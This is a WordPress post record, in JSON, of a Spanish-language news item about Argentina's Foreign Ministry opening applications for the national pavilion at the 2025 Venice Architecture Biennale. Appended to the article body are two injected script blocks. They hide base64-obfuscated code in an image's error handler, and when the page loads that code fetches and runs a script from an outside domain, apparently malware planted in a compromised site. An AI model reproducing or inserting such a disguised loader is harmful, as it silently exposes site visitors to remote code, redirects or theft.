{"id":4579,"date":"2024-11-15T08:55:52","date_gmt":"2024-11-15T11:55:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4579"},"modified":"2025-08-13T23:45:36","modified_gmt":"2025-08-14T02:45:36","slug":"la-cancilleria-abrio-la-convocatoria-para-el-envio-argentino-a-la-bienal-de-arquitectura-de-venecia-2025","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4579","title":{"rendered":"La Canciller\u00eda abri\u00f3 la convocatoria para el env\u00edo argentino a la Bienal de Arquitectura de Venecia 2025"},"content":{"rendered":"\n<h5 class=\"wp-block-heading\"><em><strong>La Direcci\u00f3n de Asuntos Culturales de la Canciller\u00eda argentina y la C\u00e1mara Empresaria de Desarrolladores Urbanos (CEDU) convocan a la presentaci\u00f3n de anteproyectos para participar del Pabell\u00f3n Argentino en la 19\u00b0 Exposici\u00f3n Internacional de Arquitectura de la Bienal de Venecia,\u00a0<\/strong>uno de los eventos culturales m\u00e1s prestigiosos a nivel internacional. La presencia argentina asegura una vidriera del m\u00e1s alto nivel mundial para la difusi\u00f3n de nuestra producci\u00f3n cultural, art\u00edstica y arquitect\u00f3nica.<\/em><\/h5>\n\n\n\n<p>El lanzamiento de la convocatoria fue anunciado en el Palacio San Mart\u00edn, luego de la firma de un acta compromiso entre la Canciller\u00eda -representada por la Embajadora Nora Capello, firmante por la Secretar\u00eda de Relaciones Econ\u00f3micas Internacionales- y la CEDU -representada por su Presidente, Arquitecto Dami\u00e1n Tabakman y la Directora Ejecutiva, Arquitecta Mali V\u00e1zquez-. Asimismo, asisti\u00f3 al evento Diego Sucalesca, presidente de la Agencia Argentina de Inversiones y Comercio Internacional (AAICI).<\/p>\n\n\n\n<p>La convocatoria a la Bienal de Venecia se realiza por primera vez a partir de una alianza p\u00fablico-privada, con el prop\u00f3sito de lograr una mayor transparencia y menores costos para el Estado Nacional. De esta manera se busca impulsar la internacionalizaci\u00f3n de la arquitectura, a partir de la interacci\u00f3n y la complementariedad entre actores.<\/p>\n\n\n\n<p>Este a\u00f1o, el curador general designado por&nbsp;<em>La Biennale<\/em>&nbsp;es el arquitecto e ingeniero italiano Carlo Ratti. El lema, que fue presentado en italiano y en ingl\u00e9s, es:&nbsp;<em>Intelligens. Natural. Artificial.&nbsp;<\/em><em>Collective<\/em>. En espa\u00f1ol, El t\u00edtulo&nbsp;<em>Intelligens<\/em>&nbsp;est\u00e1 vinculado al t\u00e9rmino moderno \u201cinteligencia\u201d, pero tambi\u00e9n evoca un conjunto m\u00e1s amplio de significados asociados. De hecho, la s\u00edlaba final, \u201cgens\u201d, en lat\u00edn significa \u201cgente\u201d. De aqu\u00ed surge una nueva ra\u00edz ficticia que sugiere un futuro de inteligencia m\u00faltiple e imaginativo.<\/p>\n\n\n\n<p>Los anteproyectos deber\u00e1n ser presentados a trav\u00e9s del formulario alojado en el sitio web de Canciller\u00eda, desde el 13 de noviembre hasta el 6 de diciembre de 2024 a las 23:59 horas.<\/p>\n\n\n\n<p>Su evaluaci\u00f3n estar\u00e1 a cargo del jurado conformado por la arquitecta B\u00e1rbara Berson -en representaci\u00f3n de la Federaci\u00f3n Argentina de Entidades de Arquitectos (FADEA)-, la arquitecta Daniela Bergaizen -en representaci\u00f3n de la Agencia Argentina de Inversiones y Comercio Internacional (AAICI)- y los arquitectos Gerardo Caballero, Marcelo Faiden y Mariano Clusellas, en representaci\u00f3n de la CEDU.<\/p>\n\n\n\n<p>Para la elecci\u00f3n se tendr\u00e1 en cuenta el concepto curatorial y la museograf\u00eda de la propuesta, los contenidos que se aborden y la forma en que se adapte al espacio del Pabell\u00f3n Argentino.<\/p>\n\n\n\n<p><strong>Las bases y condiciones y el formulario de aplicaci\u00f3n se encuentran disponibles en la web de la Canciller\u00eda:<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/cancilleria.gob.ar\/es\/culturales\/cultura\/argentina-en-la-bienal-de-venecia\/exposicion-internacional-arquitectura\">https:\/\/cancilleria.gob.ar\/es\/culturales\/cultura\/argentina-en-la-bienal-de-venecia\/exposicion-internacional-arquitectura<\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Direcci\u00f3n de Asuntos Culturales de la Canciller\u00eda argentina y la C\u00e1mara Empresaria de Desarrolladores Urbanos (CEDU) convocan a la presentaci\u00f3n de anteproyectos para participar del Pabell\u00f3n Argentino en la 19\u00b0 Exposici\u00f3n Internacional de Arquitectura de la Bienal de Venecia,\u00a0uno de los eventos culturales m\u00e1s prestigiosos a nivel internacional. La presencia argentina asegura una vidriera [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4580,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26,22],"tags":[],"class_list":{"0":"post-4579","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales","9":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4579"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4579"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4579\/revisions"}],"predecessor-version":[{"id":6640,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4579\/revisions\/6640"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4580"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4579"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}